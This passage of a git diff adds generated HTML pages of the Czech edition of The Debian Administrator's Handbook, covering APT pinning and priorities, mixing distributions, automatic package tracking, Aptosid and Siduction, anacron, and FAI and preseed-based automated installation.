+Pin-Priority: 500
+</pre></div></div><div
+            class="para">
+				Let's suppose that you only want to use packages from the stable version of Debian. Those provided in other versions should not be installed except if explicitly requested. You could write the following entries in the <code
+              class="filename">/etc/apt/preferences</code> file:
+			</div><div
+            class="informalexample"><pre
+              class="programlisting">Package: *
+Pin: release a=stable
+Pin-Priority: 900
+
+Package: *
+Pin: release o=Debian
+Pin-Priority: -10
+</pre></div><div
+            class="para">
+				<code
+              class="literal">a=stable</code> defines the name of the selected distribution. <code
+              class="literal">o=Debian</code> limits the scope to packages whose origin is “Debian”.
+			</div><div
+            class="para">
+				Let's now assume that you have a server with several local programs depending on the version 5.24 of Perl and that you want to ensure that upgrades will not install another version of it. You could use this entry:
+			</div><div
+            class="informalexample"><pre
+              class="programlisting">Package: perl
+Pin: version 5.24*
+Pin-Priority: 1001
+</pre></div><div
+            class="para">
+				The reference documentation for this configuration file is available in the manual page <span
+              class="citerefentry"><span
+                class="refentrytitle">apt_preferences</span>(5)</span>, which you can display with <code
+              class="command">man apt_preferences</code>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Comments in <code
+                        class="filename">/etc/apt/preferences</code></strong></p></div></div></div><a
+              id="id-1.9.11.12.22.2"
+              class="indexterm"></a><a
+              id="id-1.9.11.12.22.3"
+              class="indexterm"></a><a
+              id="id-1.9.11.12.22.4"
+              class="indexterm"></a><div
+              class="para">
+				There is no official syntax to put comments in the <code
+                class="filename">/etc/apt/preferences</code> file, but some textual descriptions can be provided by putting one or more “<code
+                class="literal">Explanation</code>” fields at the start of each entry:
+			</div><div
+              class="informalexample"><pre
+                class="programlisting">Explanation: The package xserver-xorg-video-intel provided
+Explanation: in experimental can be used safely
+Package: xserver-xorg-video-intel
+Pin: release a=experimental
+Pin-Priority: 500
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-mix-distros"></a>6.2.6. Working with Several Distributions</h3></div></div></div><div
+            class="para">
+				<code
+              class="command">apt</code> being such a marvelous tool, it is tempting to pick packages coming from other distributions. For example, after having installed a <span
+              class="distribution distribution">Stable</span> system, you might want to try out a software package available in <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span> without diverging too much from the system's initial state.
+			</div><div
+            class="para">
+				Even if you will occasionally encounter problems while mixing packages from different distributions, <code
+              class="command">apt</code> manages such coexistence very well and limits risks very effectively. The best way to proceed is to list all distributions used in <code
+              class="filename">/etc/apt/sources.list</code> (some people always put the three distributions, but remember that <span
+              class="distribution distribution">Unstable</span> is reserved for experienced users) and to define your reference distribution with the <code
+              class="literal">APT::Default-Release</code> parameter (see <a
+              class="xref"
+              href="sect.apt-get.html#sect.apt-upgrade">6.2.3 – „System Upgrade“</a>).
+			</div><div
+            class="para">
+				Let's suppose that <span
+              class="distribution distribution">Stable</span> is your reference distribution but that <span
+              class="distribution distribution">Testing</span> and <span
+              class="distribution distribution">Unstable</span> are also listed in your <code
+              class="filename">sources.list</code> file. In this case, you can use <code
+              class="command">apt install <em
+                class="replaceable">package</em>/testing</code> to install a package from <span
+              class="distribution distribution">Testing</span>. If the installation fails due to some unsatisfiable dependencies, let it solve those dependencies within <span
+              class="distribution distribution">Testing</span> by adding the <code
+              class="literal">-t testing</code> parameter. The same obviously applies to <span
+              class="distribution distribution">Unstable</span>.
+			</div><div
+            class="para">
+				In this situation, upgrades (<code
+              class="command">upgrade</code> and <code
+              class="command">full-upgrade</code>) are done within <span
+              class="distribution distribution">Stable</span> except for packages already upgraded to another distribution: those will follow updates available in the other distributions. We will explain this behavior with the help of the default priorities set by APT below. Do not hesitate to use <code
+              class="command">apt-cache policy</code> (see sidebar <a
+              class="xref"
+              href="sect.apt-get.html#sidebar.apt-cache-policy"><span
+                class="emphasis"><em>TIP</em></span> <code
+                class="command">apt-cache policy</code></a>) to verify the given priorities.
+			</div><div
+            class="para">
+				Everything centers around the fact that APT only considers packages of higher or equal version than the installed one (assuming that <code
+              class="filename">/etc/apt/preferences</code> has not been used to force priorities higher than 1000 for some packages).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.apt-cache-policy"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">apt-cache policy</code></strong></p></div></div></div><div
+              class="para">
+				To gain a better understanding of the mechanism of priority, do not hesitate to execute <code
+                class="command">apt-cache policy</code> to display the default priority associated with each package source. You can also use <code
+                class="command">apt-cache policy <em
+                  class="replaceable">package</em></code> to display the priorities of all available versions of a given package.
+			</div></div><div
+            class="para">
+				Let's assume that you have installed version 1 of a first package from <span
+              class="distribution distribution">Stable</span> and that version 2 and 3 are available respectively in <span
+              class="distribution distribution">Testing</span> and <span
+              class="distribution distribution">Unstable</span>. The installed version has a priority of 100 but the version available in <span
+              class="distribution distribution">Stable</span> (the very same) has a priority of 990 (because it is part of the target release). Packages in <span
+              class="distribution distribution">Testing</span> and <span
+              class="distribution distribution">Unstable</span> have a priority of 500 (the default priority of a non-installed version). The winner is thus version 1 with a priority of 990. The package “stays in <span
+              class="distribution distribution">Stable</span>”.
+			</div><div
+            class="para">
+				Let's take the example of another package whose version 2 has been installed from <span
+              class="distribution distribution">Testing</span>. Version 1 is available in <span
+              class="distribution distribution">Stable</span> and version 3 in <span
+              class="distribution distribution">Unstable</span>. Version 1 (of priority 990 — thus lower than 1000) is discarded because it is lower than the installed version. This only leaves version 2 and 3, both of priority 500. Faced with this alternative, APT selects the newest version, the one from <span
+              class="distribution distribution">Unstable</span>.If you don't want a package installed from <span
+              class="distribution distribution">Testing</span> to migrate to <span
+              class="distribution distribution">Unstable</span>, you have to assign a priority lower than 500 (490 for example) to packages coming from <span
+              class="distribution distribution">Unstable</span>. You can modify <code
+              class="filename">/etc/apt/preferences</code> to this effect:
+			</div><pre
+            class="programlisting">Package: *
+Pin: release a=unstable
+Pin-Priority: 490
+</pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.automatic-tracking"></a>6.2.7. Tracking Automatically Installed Packages</h3></div></div></div><div
+            class="para">
+				One of the essential functionalities of <code
+              class="command">apt</code> is the tracking of packages installed only through dependencies. These packages are called “automatic”, and often include libraries for instance.
+			</div><div
+            class="para">
+				With this information, when packages are removed, the package managers can compute a list of automatic packages that are no longer needed (because there is no “manually installed” packages depending on them). <code
+              class="command">apt-get autoremove</code> or <code
+              class="command">apt autoremove</code> will get rid of those packages. <code
+              class="command">aptitude</code> does not have this command because it removes them automatically as soon as they are identified. In all cases, the tools display a clear message listing the affected packages.
+			</div><a
+            id="id-1.9.11.14.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.14.5"
+            class="indexterm"></a><a
+            id="id-1.9.11.14.6"
+            class="indexterm"></a><a
+            id="id-1.9.11.14.7"
+            class="indexterm"></a><div
+            class="para">
+				It is a good habit to mark as automatic any package that you don't need directly so that they are automatically removed when they aren't necessary anymore. <code
+              class="command">apt-mark auto <em
+                class="replaceable">package</em></code> will mark the given package as automatic whereas <code
+              class="command">apt-mark manual <em
+                class="replaceable">package</em></code> does the opposite. <code
+              class="command">aptitude markauto</code> and <code
+              class="command">aptitude unmarkauto</code> work in the same way although they offer more features for marking many packages at once (see <a
+              class="xref"
+              href="sect.apt-frontends.html#sect.aptitude">6.4.1 – „<code
+                class="command">aptitude</code>“</a>). The console-based interactive interface of <code
+              class="command">aptitude</code> also makes it easy to review the “automatic flag” on many packages.
+			</div><a
+            id="id-1.9.11.14.9"
+            class="indexterm"></a><div
+            class="para">
+				People might want to know why an automatically installed package is present on the system. To get this information from the command line, you can use <code
+              class="command">aptitude why <em
+                class="replaceable">package</em></code> (<code
+              class="command">apt</code> and <code
+              class="command">apt-get</code> have no similar feature):
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>aptitude why python-debian
+</code></strong><code
+              class="computeroutput">i   aptitude         Recommends apt-xapian-index         
+i A apt-xapian-index Depends    python-debian (&gt;= 0.1.15)
+</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> <code
+                        class="command">deborphan</code> and <code
+                        class="command">debfoster</code></strong></p></div></div></div><a
+              id="id-1.9.11.14.12.2"
+              class="indexterm"></a><a
+              id="id-1.9.11.14.12.3"
+              class="indexterm"></a><div
+              class="para">
+				In days where <code
+                class="command">apt</code>, <code
+                class="command">apt-get</code> and <code
+                class="command">aptitude</code> were not able to track automatic packages, there were two utilities producing lists of unnecessary packages: <code
+                class="command">deborphan</code> and <code
+                class="command">debfoster</code>.
+			</div><div
+              class="para">
+				<code
+                class="command">deborphan</code> is the most rudimentary of both. It simply scans the <code
+                class="literal">libs</code> and <code
+                class="literal">oldlibs</code> sections (in the absence of supplementary instructions) looking for the packages that are currently installed and that no other package depends on. The resulting list can then serve as a basis to remove unneeded packages.
+			</div><div
+              class="para">
+				<code
+                class="command">debfoster</code> has a more elaborate approach, very similar to APT's one: it maintains a list of packages that have been explicitly installed, and remembers what packages are really required between each invocation. If new packages appear on the system and if <code
+                class="command">debfoster</code> doesn't know them as required packages, they will be shown on the screen together with a list of their dependencies. The program then offers a choice: remove the package (possibly together with those that depend on it), mark it as explicitly required, or ignore it temporarily.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="apt.html"><strong>Předcházející</strong>Kapitola 6. Maintenance and Updates: The APT Tools</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-cache.html"><strong>Další</strong>6.3. The apt-cache Command</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.aptosid.html b/tmp/cs-CZ/html/sect.aptosid.html
new file mode 100644
index 000000000..643bdd3a6
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.aptosid.html
@@ -0,0 +1,97 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.5. Aptosid and Siduction</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.knoppix.html"
+        title="A.4. Knoppix" /><link
+        rel="next"
+        href="sect.grml.html"
+        title="A.6. Grml" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.aptosid.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.knoppix.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.grml.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.aptosid"></a>A.5. Aptosid and Siduction</h2></div></div></div><a
+          id="id-1.20.8.2"
+          class="indexterm"></a><a
+          id="id-1.20.8.3"
+          class="indexterm"></a><a
+          id="id-1.20.8.4"
+          class="indexterm"></a><div
+          class="para">
+			These community-based distributions track the changes in Debian <span
+            class="distribution distribution">Sid</span> (<span
+            class="distribution distribution">Unstable</span>) — hence their name. The modifications are limited in scope: the goal is to provide the most recent software and to update drivers for the most recent hardware, while still allowing users to switch back to the official Debian distribution at any time. Aptosid was previously known as Sidux, and Siduction is a more recent fork of Aptosid. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://aptosid.com">http://aptosid.com</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://siduction.org">http://siduction.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.knoppix.html"><strong>Předcházející</strong>A.4. Knoppix</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.grml.html"><strong>Další</strong>A.6. Grml</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html b/tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html
new file mode 100644
index 000000000..1a62089c7
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html
@@ -0,0 +1,131 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.8. Scheduling Asynchronous Tasks: anacron</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.task-scheduling-cron-atd.html"
+        title="9.7. Scheduling Tasks with cron and atd" /><link
+        rel="next"
+        href="sect.quotas.html"
+        title="9.9. Quotas" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.asynchronous-task-scheduling-anacron.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.task-scheduling-cron-atd.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quotas.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.asynchronous-task-scheduling-anacron"></a>9.8. Scheduling Asynchronous Tasks: <code
+                  class="command">anacron</code></h2></div></div></div><div
+          class="para">
+			<code
+            class="command">anacron</code> is the daemon that completes <code
+            class="command">cron</code> for computers that are not on at all times. Since regular tasks are usually scheduled for the middle of the night, they will never be executed if the computer is off at that time. The purpose of <code
+            class="command">anacron</code> is to execute them, taking into account periods in which the computer is not working.
+		</div><a
+          id="id-1.12.11.3"
+          class="indexterm"></a><div
+          class="para">
+			Please note that <code
+            class="command">anacron</code> will frequently execute such activity a few minutes after booting the machine, which can render the computer less responsive. This is why the tasks in the <code
+            class="filename">/etc/anacrontab</code> file are started with the <code
+            class="command">nice</code> command, which reduces their execution priority and thus limits their impact on the rest of the system. Beware, the format of this file is not the same as that of <code
+            class="filename">/etc/crontab</code>; if you have particular needs for <code
+            class="command">anacron</code>, see the <span
+            class="citerefentry"><span
+              class="refentrytitle">anacrontab</span>(5)</span> manual page.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Priorities and <code
+                      class="command">nice</code></strong></p></div></div></div><div
+            class="para">
+			Unix systems (and thus Linux) are multi-tasking and multi-user systems. Indeed, several processes can run in parallel, and be owned by different users: the kernel mediates access to the resources between the different processes. As a part of this task, it has a concept of priority, which allows it to favor certain processes over others, as needed. When you know that a process can run in low priority, you can indicate so by running it with <code
+              class="command">nice <em
+                class="replaceable">program</em></code>. The program will then have a smaller share of the CPU, and will have a smaller impact on other running processes. Of course, if no other processes needs to run, the program will not be artificially held back.
+		</div><div
+            class="para">
+			<code
+              class="command">nice</code> works with levels of “niceness”: the positive levels (from 1 to 19) progressively lower the priority, while the negative levels (from -1 to -20) will increase it — but only root can use these negative levels. Unless otherwise indicated (see the <span
+              class="citerefentry"><span
+                class="refentrytitle">nice</span>(1)</span> manual page), <code
+              class="command">nice</code> increases the current level by 10.
+		</div><div
+            class="para">
+			If you discover that an already running task should have been started with <code
+              class="command">nice</code> it is not too late to fix it; the <code
+              class="command">renice</code> command changes the priority of an already running process, in either direction (but reducing the “niceness” of a process is reserved for the root user).
+		</div></div><div
+          class="para">
+			Installation of the <span
+            class="pkg pkg">anacron</span> package deactivates execution by <code
+            class="command">cron</code> of the scripts in the <code
+            class="filename">/etc/cron.hourly/</code>, <code
+            class="filename">/etc/cron.daily/</code>, <code
+            class="filename">/etc/cron.weekly/</code>, and <code
+            class="filename">/etc/cron.monthly/</code> directories. This avoids their double execution by <code
+            class="command">anacron</code> and <code
+            class="command">cron</code>. The <code
+            class="command">cron</code> command remains active and will continue to handle the other scheduled tasks (especially those scheduled by users).
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.task-scheduling-cron-atd.html"><strong>Předcházející</strong>9.7. Scheduling Tasks with cron and atd</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quotas.html"><strong>Další</strong>9.9. Quotas</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.automated-installation.html b/tmp/cs-CZ/html/sect.automated-installation.html
new file mode 100644
index 000000000..b8a468e63
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.automated-installation.html
@@ -0,0 +1,533 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">12.3. Automated Installation</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="prev"
+        href="sect.virtualization.html"
+        title="12.2. Virtualization" /><link
+        rel="next"
+        href="sect.monitoring.html"
+        title="12.4. Monitoring" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.automated-installation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtualization.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.monitoring.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.automated-installation"></a>12.3. Automated Installation</h2></div></div></div><a
+          id="id-1.15.6.2"
+          class="indexterm"></a><a
+          id="id-1.15.6.3"
+          class="indexterm"></a><div
+          class="para">
+			The Falcot Corp administrators, like many administrators of large IT services, need tools to install (or reinstall) quickly, and automatically if possible, their new machines.
+		</div><div
+          class="para">
+			These requirements can be met by a wide range of solutions. On the one hand, generic tools such as SystemImager handle this by creating an image based on a template machine, then deploy that image to the target systems; at the other end of the spectrum, the standard Debian installer can be preseeded with a configuration file giving the answers to the questions asked during the installation process. As a sort of middle ground, a hybrid tool such as FAI (<span
+            class="emphasis"><em>Fully Automatic Installer</em></span>) installs machines using the packaging system, but it also uses its own infrastructure for tasks that are more specific to massive deployments (such as starting, partitioning, configuration and so on).
+		</div><div
+          class="para">
+			Each of these solutions has its pros and cons: SystemImager works independently from any particular packaging system, which allows it to manage large sets of machines using several distinct Linux distributions. It also includes an update system that doesn't require a reinstallation, but this update system can only be reliable if the machines are not modified independently; in other words, the user must not update any software on their own, or install any other software. Similarly, security updates must not be automated, because they have to go through the centralized reference image maintained by SystemImager. This solution also requires the target machines to be homogeneous, otherwise many different images would have to be kept and managed (an i386 image won't fit on a powerpc machine, and so on).
+		</div><div
+          class="para">
+			On the other hand, an automated installation using debian-installer can adapt to the specifics of each machine: the installer will fetch the appropriate kernel and software packages from the relevant repositories, detect available hardware, partition the whole hard disk to take advantage of all the available space, install the corresponding Debian system, and set up an appropriate bootloader. However, the standard installer will only install standard Debian versions, with the base system and a set of pre-selected “tasks”; this precludes installing a particular system with non-packaged applications. Fulfilling this particular need requires customizing the installer… Fortunately, the installer is very modular, and there are tools to automate most of the work required for this customization, most importantly simple-CDD (CDD being an acronym for <span
+            class="emphasis"><em>Custom Debian Derivative</em></span>). Even the simple-CDD solution, however, only handles initial installations; this is usually not a problem since the APT tools allow efficient deployment of updates later on.
+		</div><div
+          class="para">
+			We will only give a rough overview of FAI, and skip SystemImager altogether (which is no longer in Debian), in order to focus more intently on debian-installer and simple-CDD, which are more interesting in a Debian-only context.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.fai"></a>12.3.1. Fully Automatic Installer (FAI)</h3></div></div></div><a
+            id="id-1.15.6.9.2"
+            class="indexterm"></a><div
+            class="para">
+				<span
+              class="foreignphrase"><em
+                class="foreignphrase">Fully Automatic Installer</em></span> is probably the oldest automated deployment system for Debian, which explains its status as a reference; but its very flexible nature only just compensates for the complexity it involves.
+			</div><div
+            class="para">
+				FAI requires a server system to store deployment information and allow target machines to boot from the network. This server requires the <span
+              class="pkg pkg">fai-server</span> package (or <span
+              class="pkg pkg">fai-quickstart</span>, which also brings the required elements for a standard configuration).
+			</div><div
+            class="para">
+				FAI uses a specific approach for defining the various installable profiles. Instead of simply duplicating a reference installation, FAI is a full-fledged installer, fully configurable via a set of files and scripts stored on the server; the default location <code
+              class="filename">/srv/fai/config/</code> is not automatically created, so the administrator needs to create it along with the relevant files. Most of the times, these files will be customized from the example files available in the documentation for the <span
+              class="pkg pkg">fai-doc</span> package, more particularly the <code
+              class="filename">/usr/share/doc/fai-doc/examples/simple/</code> directory.
+			</div><div
+            class="para">
+				Once the profiles are defined, the <code
+              class="command">fai-setup</code> command generates the elements required to start an FAI installation; this mostly means preparing or updating a minimal system (NFS-root) used during installation. An alternative is to generate a dedicated boot CD with <code
+              class="command">fai-cd</code>.
+			</div><div
+            class="para">
+				Creating all these configuration files requires some understanding of the way FAI works. A typical installation process is made of the following steps:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						fetching a kernel from the network, and booting it;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						mounting the root filesystem from NFS;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						executing <code
+                    class="command">/usr/sbin/fai</code>, which controls the rest of the process (the next steps are therefore initiated by this script);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						copying the configuration space from the server into <code
+                    class="filename">/fai/</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						running <code
+                    class="command">fai-class</code>. The <code
+                    class="filename">/fai/class/[0-9][0-9]*</code> scripts are executed in turn, and return names of “classes” that apply to the machine being installed; this information will serve as a base for the following steps. This allows for some flexibility in defining the services to be installed and configured.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						fetching a number of configuration variables, depending on the relevant classes;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						partitioning the disks and formatting the partitions, based on information provided in <code
+                    class="filename">/fai/disk_config/<em
+                      class="replaceable">class</em></code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						mounting said partitions;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						installing the base system;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						preseeding the Debconf database with <code
+                    class="command">fai-debconf</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						fetching the list of available packages for APT;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						installing the packages listed in <code
+                    class="filename">/fai/package_config/<em
+                      class="replaceable">class</em></code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						executing the post-configuration scripts, <code
+                    class="filename">/fai/scripts/<em
+                      class="replaceable">class</em>/[0-9][0-9]*</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						recording the installation logs, unmounting the partitions, and rebooting.
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.d-i-preseeding"></a>12.3.2. Preseeding Debian-Installer</h3></div></div></div><a
+            id="id-1.15.6.10.2"
+            class="indexterm"></a><a
+            id="id-1.15.6.10.3"
+            class="indexterm"></a><div
+            class="para">
+				At the end of the day, the best tool to install Debian systems should logically be the official Debian installer. This is why, right from its inception, debian-installer has been designed for automated use, taking advantage of the infrastructure provided by <span
+              class="pkg pkg">debconf</span>. The latter allows, on the one hand, to reduce the number of questions asked (hidden questions will use the provided default answer), and on the other hand, to provide the default answers separately, so that installation can be non-interactive. This last feature is known as <span
+              class="emphasis"><em>preseeding</em></span>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Debconf with a centralized database</strong></p></div></div></div><a
+              id="id-1.15.6.10.5.2"
+              class="indexterm"></a><div
+              class="para">
+				Preseeding allows to provide a set of answers to Debconf questions at installation time, but these answers are static and do not evolve as time passes. Since already-installed machines may need upgrading, and new answers may become required, the <code
+                class="filename">/etc/debconf.conf</code> configuration file can be set up so that Debconf uses external data sources (such as an LDAP directory server, or a remote file accessed via NFS or Samba). Several external data sources can be defined at the same time, and they complement one another. The local database is still used (for read-write access), but the remote databases are usually restricted to reading. The <span
+                class="citerefentry"><span
+                  class="refentrytitle">debconf.conf</span>(5)</span> manual page describes all the possibilities in detail (you need the <span
+                class="pkg pkg">debconf-doc</span> package).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.10.6"></a>12.3.2.1. Using a Preseed File</h4></div></div></div><div
+              class="para">
+					There are several places where the installer can get a preseeding file:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							in the initrd used to start the machine; in this case, preseeding happens at the very beginning of the installation, and all questions can be avoided. The file just needs to be called <code
+                      class="filename">preseed.cfg</code> and stored in the initrd root.
